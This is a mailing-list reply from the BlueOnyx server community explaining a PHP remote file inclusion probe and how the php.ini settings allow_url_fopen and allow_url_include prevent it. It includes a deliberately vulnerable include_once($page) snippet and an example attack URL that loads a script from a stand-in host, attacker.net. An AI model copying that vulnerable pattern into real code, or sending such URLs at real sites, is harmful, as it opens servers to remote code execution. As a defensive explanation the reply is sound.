Hi Wayne, > but recently I've been paying more attention to them. > > this is the log from dfix: > > Not really sure what it means other than it blocked the IP address. > > ?p=1693 is a valid link on my site, does that mean this is the page they > tried to take over and they are coming from hackorea ?
Yeah, this is a common attack vector for PHP scripts. Someone probes your PHP scripts to see if he can trick it into loading, including and running an externally hosted PHP script. In your case the external script would just show "ShiroHigeShiroHige" somewhere within your page *if* the probing had revealed a vulnerability and only the attacker would see that. But then the attacker would probably have escalated by including something more nasty. :o) Say you have this code on your website: <? // This is a vulnerable index.php and the code below is a really bad idea: include_once($page); /* ... rest of your page */ ?> Now *if* you'd usually call subpages for your site with something like this ... http://www.site.com/index.php?page=<number> ... then the attacker could trick your badly coded index.php into loading an external and even remotely hosted PHP file by simply calling up your index.php this way: http://www.site.com/index.php?page=http://attacker.net/include_me.txt To prevent stuff like that from happening, Blueonyx usually sets the following two switches in php.ini: allow_url_fopen = Off allow_url_include = Off These are the safe settings for them and prevent that PHP scripts can access and include remotely hosted non-local PHP scripts. "allow_url_fopen" prevents access of PHP scripts to non-local files which are called via an URL. "allow_url_include" controls if it is allowed to include remotely hosted PHP code into your local scripts for execution. Which is a really bad idea, so it should always be set to "Off". There may be reasons when you may want to allows "allow_url_fopen", though. Like when your PHP script needs to access a remote RSS feed, or needs to connect somewhere else to see if there are updates available for its components. However: If you allow "allow_url_fopen", be sure to double check that "allow_url_include" is set to "Off". Short summary: Access = fine. Include = bad. -- With best regards Michael Stauber _______________________________________________ Blueonyx mailing list Blueonyx@mail.blueonyx.it http://mail.blueonyx.it/mailman/listinfo/blueonyx
